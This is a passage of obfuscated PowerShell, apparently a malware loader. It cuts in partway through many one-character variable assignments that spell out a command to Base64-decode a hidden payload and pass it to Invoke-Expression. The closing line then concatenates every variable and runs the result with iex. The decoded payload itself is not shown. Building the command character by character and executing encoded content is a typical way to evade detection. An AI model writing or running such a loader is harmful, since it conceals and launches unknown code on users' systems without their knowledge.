';$1667='[';$1668='S';$1669='y';$1670='s';$1671='t';$1672='e';$1673='m';$1674='.';$1675='T';$1676='e';$1677='x';$1678='t';$1679='.';$1680='E';$1681='n';$1682='c';$1683='o';$1684='d';$1685='i';$1686='n';$1687='g';$1688=']';$1689=':';$1690=':';$1691='A';$1692='S';$1693='C';$1694='I';$1695='I';$1696='.';$1697='G';$1698='e';$1699='t';$1700='S';$1701='t';$1702='r';$1703='i';$1704='n';$1705='g';$1706='(';$1707='[';$1708='S';$1709='y';$1710='s';$1711='t';$1712='e';$1713='m';$1714='.';$1715='C';$1716='o';$1717='n';$1718='v';$1719='e';$1720='r';$1721='t';$1722=']';$1723=':';$1724=':';$1725='F';$1726='r';$1727='o';$1728='m';$1729='B';$1730='a';$1731='s';$1732='e';$1733='6';$1734='4';$1735='S';$1736='t';$1737='r';$1738='i';$1739='n';$1740='g';$1741='(';$1742='$';$1743='v';$1744='v';$1745='E';$1746='E';$1747=')';$1748=')';$1749=' ';$1750='|';$1751=' ';$1752='I';$1753='E';$1754='X';$r= ' ';iex($0+$1+$2+$3+$4+$5+$6+$7+$8+$9+$10+$11+$12+$13+$14+$15+$16+$17+$18+$19+$20+$21+$22+$23+$24+$25+$26+$27+$28+$29+$30+$31+$32+$33+$34+$35+$36+$37+$38+$39+$40+$41+$42+$43+$44+$45+$46+$47+$48+$49+$50+$51+$52+$53+$54+$55+$56+$57+$58+$59+$60+$61+$62+$63+$64+$65+$66+$67+$68+$69+$70+$71+$72+$73+$74+$75+$76+$77+$78+$79+$80+$81+$82+$83+$84+$85+$86+$87+$88+$89+$90+$91+$92+$93+$94+$95+$96+$97+$98+$99+$100+$101+$102+$103+$104+$105+$106+$107+$108+$109+$110+$111+$112+$113+$114+$115+$116+$117+$118+$119+$120+$121+$122+$123+$124+$125+$126+$127+$128+$129+$130+$131+$132+$133+$134+$135+$136+$137+$138+$139+$140+$141+$142+$143+$144+$145+$146+$147+$148+$149+$150+$151+$152+$153+$154+$155+$156+$157+$158+$159+$160+$161+$162+$163+$164+$165+$166+$167+$168+$169+$170+$171+$172+$173+$174+$175+$176+$177+$178+$179+$180+$181+$182+$183+$184+$185+$186+$187+$188+$189+$190+$191+$192+$193+$194+$195+$196+$197+$198+$199+$200+$201+$202+$203+$204+$205+$206+$207+$208+$209+$210+$211+$212+$213+$214+$215+$216+$217+$218+$219+$220+$221+$222+$223+$224+$225+$226+$227+$228+$229+$230+$231+$232+$233+$234+$235+$236+$237+$238+$239+$240+$241+$242+$243+$244+$245+$246+$247+$248+$249+$250+$251+$252+$253+$254+$255+$256+$257+$258+$259+$260+$261+$262+$263+$264+$265+$266+$267+$268+$269+$270+$271+$272+$273+$274+$275+$276+$277+$278+$279+$280+$281+$282+$283+$284+$285+$286+$287+$288+$289+$290+$291+$292+$293+$294+$295+$296+$297+$298+$299+$300+$301+$302+$303+$304+$305+$306+$307+$308+$309+$310+$311+$312+$313+$314+$315+$316+$317+$318+$319+$320+$321+$322+$323+$324+$325+$326+$327+$328+$329+$330+$331+$332+$333+$334+$335+$336+$337+$338+$339+$340+$341+$342+$343+$344+$345+$346+$347+$348+$349+$350+$351+$352+$353+$354+$355+$356+$357+$358+$359+$360+$361+$362+$363+$364+$365+$366+$367+$368+$369+$370+$371+$372+$373+$374+$375+$376+$377+$378+$379+$380+$381+$382+$383+$384+$385+$386+$387+$388+$389+$390+$391+$392+$393+$394+$395+$396+$397+$398+$399+$400+$401+$402+$403+$404+$405+$406+$407+$408+$409+$410+$411+$412+$413+$414+$415+$416+$417+$418+$419+$420+$421+$422+$423+$424+$425+$426+$427+$428+$429+$430+$431+$432+$433+$434+$435+$436+$437+$438+$439+$440+$441+$442+$443+$444+$445+$446+$447+$448+$449+$450+$451+$452+$453+$454+$455+$456+$457+$458+$459+$460+$461+$462+$463+$464+$465+$466+$467+$468+$469+$470+$471+$472+$473+$474+$475+$476+$477+$478+$479+$480+$481+$482+$483+$484+$485+$486+$487+$488+$489+$490+$491+$492+$493+$494+$495+$496+$497+$498+$499+$500+$501+$502+$503+$504+$505+$506+$507+$508+$509+$510+$511+$512+$513+$514+$515+$516+$517+$518+$519+$520+$521+$522+$523+$524+$525+$526+$527+$528+$529+$530+$531+$532+$533+$534+$535+$536+$537+$538+$539+$540+$541+$542+$543+$544+$545+$546+$547+$548+$549+$550+$551+$552+$553+$554+$555+$556+$557+$558+$559+$560+$561+$562+$563+$564+$565+$566+$567+$568+$569+$570+$571+$572+$573+$574+$575+$576+$577+$578+$579+$580+$581+$582+$583+$584+$585+$586+$587+$588+$589+$590+$591+$592+$593+$594+$595+$596+$597+$598+$599+$600+$601+$602+$603+$604+$605+$606+$607+$608+$609+$610+$611+$612+$613+$614+$615+$616+$617+$618+$619+$620+$621+$622+$623+$624+$625+$626+$627+$628+$629+$630+$631+$632+$633+$634+$635+$636+$637+$638+$639+$640+$641+$642+$643+$644+$645+$646+$647+$648+$649+$650+$651+$652+$653+$654+$655+$656+$657+$658+$659+$660+$661+$662+$663+$664+$665+$666+$667+$668+$669+$670+$671+$672+$673+$674+$675+$676+$677+$678+$679+$680+$681+$682+$683+$684+$685+$686+$687+$688+$689+$690+$691+$692+$693+$694+$695+$696+$697+$698+$699+$700+$701+$702+$703+$704+$705+$706+$707+$708+$709+$710+$711+$712+$713+$714+$715+$716+$717+$718+$719+$720+$721+$722+$723+$724+$725+$726+$727+$728+$729+$730+$731+$732+$733+$734+$735+$736+$737+$738+$739+$740+$741+$742+$743+$744+$745+$746+$747+$748+$749+$750+$751+$752+$753+$754+$755+$756+$757+$758+$759+$760+$761+$762+$763+$764+$765+$766+$767+$768+$769+$770+$771+$772+$773+$774+$775+$776+$777+$778+$779+$780+$781+$782+$783+$784+$785+$786+$787+$788+$789+$790+$791+$792+$793+$794+$795+$796+$797+$798+$799+$800+$801+$802+$803+$804+$805+$806+$807+$808+$809+$810+$811+$812+$813+$814+$815+$816+$817+$818+$819+$820+$821+$822+$823+$824+$825+$826+$827+$828+$829+$830+$831+$832+$833+$834+$835+$836+$837+$838+$839+$840+$841+$842+$843+$844+$845+$846+$847+$848+$849+$850+$851+$852+$853+$854+$855+$856+$857+$858+$859+$860+$861+$862+$863+$864+$865+$866+$867+$868+$869+$870+$871+$872+$873+$874+$875+$876+$877+$878+$879+$880+$881+$882+$883+$884+$885+$886+$887+$888+$889+$890+$891+$892+$893+$894+$895+$896+$897+$898+$899+$900+$901+$902+$903+$904+$905+$906+$907+$908+$909+$910+$911+$912+$913+$914+$915+$916+$917+$918+$919+$920+$921+$922+$923+$924+$925+$926+$927+$928+$929+$930+$931+$932+$933+$934+$935+$936+$937+$938+$939+$940+$941+$942+$943+$944+$945+$946+$947+$948+$949+$950+$951+$952+$953+$954+$955+$956+$957+$958+$959+$960+$961+$962+$963+$964+$965+$966+$967+$968+$969+$970+$971+$972+$973+$974+$975+$976+$977+$978+$979+$980+$981+$982+$983+$984+$985+$986+$987+$988+$989+$990+$991+$992+$993+$994+$995+$996+$997+$998+$999+$1000+$1001+$1002+$1003+$1004+$1005+$1006+$1007+$1008+$1009+$1010+$1011+$1012+$1013+$1014+$1015+$1016+$1017+$1018+$1019+$1020+$1021+$1022+$1023+$1024+$1025+$1026+$1027+$1028+$1029+$1030+$1031+$1032+$1033+$1034+$1035+$1036+$1037+$1038+$1039+$1040+$1041+$1042+$1043+$1044+$1045+$1046+$1047+$1048+$1049+$1050+$1051+$1052+$1053+$1054+$1055+$1056+$1057+$1058+$1059+$1060+$1061+$1062+$1063+$1064+$1065+$1066+$1067+$1068+$1069+$1070+$1071+$1072+$1073+$1074+$1075+$1076+$1077+$1078+$1079+$1080+$1081+$1082+$1083+$1084+$1085+$1086+$1087+$1088+$1089+$1090+$1091+$1092+$1093+$1094+$1095+$1096+$1097+$1098+$1099+$1100+$1101+$1102+$1103+$1104+$1105+$1106+$1107+$1108+$1109+$1110+$1111+$1112+$1113+$1114+$1115+$1116+$1117+$1118+$1119+$1120+$1121+$1122+$1123+$1124+$1125+$1126+$1127+$1128+$1129+$1130+$1131+$1132+$1133+$1134+$1135+$1136+$1137+$1138+$1139+$1140+$1141+$1142+$1143+$1144+$1145+$1146+$1147+$1148+$1149+$1150+$1151+$1152+$1153+$1154+$1155+$1156+$1157+$1158+$1159+$1160+$1161+$1162+$1163+$1164+$1165+$1166+$1167+$1168+$1169+$1170+$1171+$1172+$1173+$1174+$1175+$1176+$1177+$1178+$1179+$1180+$1181+$1182+$1183+$1184+$1185+$1186+$1187+$1188+$1189+$1190+$1191+$1192+$1193+$1194+$1195+$1196+$1197+$1198+$1199+$1200+$1201+$1202+$1203+$1204+$1205+$1206+$1207+$1208+$1209+$1210+$1211+$1212+$1213+$1214+$1215+$1216+$1217+$1218+$1219+$1220+$1221+$1222+$1223+$1224+$1225+$1226+$1227+$1228+$1229+$1230+$1231+$1232+$1233+$1234+$1235+$1236+$1237+$1238+$1239+$1240+$1241+$1242+$1243+$1244+$1245+$1246+$1247+$1248+$1249+$1250+$1251+$1252+$1253+$1254+$1255+$1256+$1257+$1258+$1259+$1260+$1261+$1262+$1263+$1264+$1265+$1266+$1267+$1268+$1269+$1270+$1271+$1272+$1273+$1274+$1275+$1276+$1277+$1278+$1279+$1280+$1281+$1282+$1283+$1284+$1285+$1286+$1287+$1288+$1289+$1290+$1291+$1292+$1293+$1294+$1295+$1296+$1297+$1298+$1299+$1300+$1301+$1302+$1303+$1304+$1305+$1306+$1307+$1308+$1309+$1310+$1311+$1312+$1313+$1314+$1315+$1316+$1317+$1318+$1319+$1320+$1321+$1322+$1323+$1324+$1325+$1326+$1327+$1328+$1329+$1330+$1331+$1332+$1333+$1334+$1335+$1336+$1337+$1338+$1339+$1340+$1341+$1342+$1343+$1344+$1345+$1346+$1347+$1348+$1349+$1350+$1351+$1352+$1353+$1354+$1355+$1356+$1357+$1358+$1359+$1360+$1361+$1362+$1363+$1364+$1365+$1366+$1367+$1368+$1369+$1370+$1371+$1372+$1373+$1374+$1375+$1376+$1377+$1378+$1379+$1380+$1381+$1382+$1383+$1384+$1385+$1386+$1387+$1388+$1389+$1390+$1391+$1392+$1393+$1394+$1395+$1396+$1397+$1398+$1399+$1400+$1401+$1402+$1403+$1404+$1405+$1406+$1407+$1408+$1409+$1410+$1411+$1412+$1413+$1414+$1415+$1416+$1417+$1418+$1419+$1420+$1421+$1422+$1423+$1424+$1425+$1426+$1427+$1428+$1429+$1430+$1431+$1432+$1433+$1434+$1435+$1436+$1437+$1438+$1439+$1440+$1441+$1442+$1443+$1444+$1445+$1446+$1447+$1448+$1449+$1450+$1451+$1452+$1453+$1454+$1455+$1456+$1457+$1458+$1459+$1460+$1461+$1462+$1463+$1464+$1465+$1466+$1467+$1468+$1469+$1470+$1471+$1472+$1473+$1474+$1475+$1476+$1477+$1478+$1479+$1480+$1481+$1482+$1483+$1484+$1485+$1486+$1487+$1488+$1489+$1490+$1491+$1492+$1493+$1494+$1495+$1496+$1497+$1498+$1499+$1500+$1501+$1502+$1503+$1504+$1505+$1506+$1507+$1508+$1509+$1510+$1511+$1512+$1513+$1514+$1515+$1516+$1517+$1518+$1519+$1520+$1521+$1522+$1523+$1524+$1525+$1526+$1527+$1528+$1529+$1530+$1531+$1532+$1533+$1534+$1535+$1536+$1537+$1538+$1539+$1540+$1541+$1542+$1543+$1544+$1545+$1546+$1547+$1548+$1549+$1550+$1551+$1552+$1553+$1554+$1555+$1556+$1557+$1558+$1559+$1560+$1561+$1562+$1563+$1564+$1565+$1566+$1567+$1568+$1569+$1570+$1571+$1572+$1573+$1574+$1575+$1576+$1577+$1578+$1579+$1580+$1581+$1582+$1583+$1584+$1585+$1586+$1587+$1588+$1589+$1590+$1591+$1592+$1593+$1594+$1595+$1596+$1597+$1598+$1599+$1600+$1601+$1602+$1603+$1604+$1605+$1606+$1607+$1608+$1609+$1610+$1611+$1612+$1613+$1614+$1615+$1616+$1617+$1618+$1619+$1620+$1621+$1622+$1623+$1624+$1625+$1626+$1627+$1628+$1629+$1630+$1631+$1632+$1633+$1634+$1635+$1636+$1637+$1638+$1639+$1640+$1641+$1642+$1643+$1644+$1645+$1646+$1647+$1648+$1649+$1650+$1651+$1652+$1653+$1654+$1655+$1656+$1657+$1658+$1659+$1660+$1661+$1662+$1663+$1664+$1665+$1666+$1667+$1668+$1669+$1670+$1671+$1672+$1673+$1674+$1675+$1676+$1677+$1678+$1679+$1680+$1681+$1682+$1683+$1684+$1685+$1686+$1687+$1688+$1689+$1690+$1691+$1692+$1693+$1694+$1695+$1696+$1697+$1698+$1699+$1700+$1701+$1702+$1703+$1704+$1705+$1706+$1707+$1708+$1709+$1710+$1711+$1712+$1713+$1714+$1715+$1716+$1717+$1718+$1719+$1720+$1721+$1722+$1723+$1724+$1725+$1726+$1727+$1728+$1729+$1730+$1731+$1732+$1733+$1734+$1735+$1736+$1737+$1738+$1739+$1740+$1741+$1742+$1743+$1744+$1745+$1746+$1747+$1748+$1749+$1750+$1751+$1752+$1753+$1754+$r);
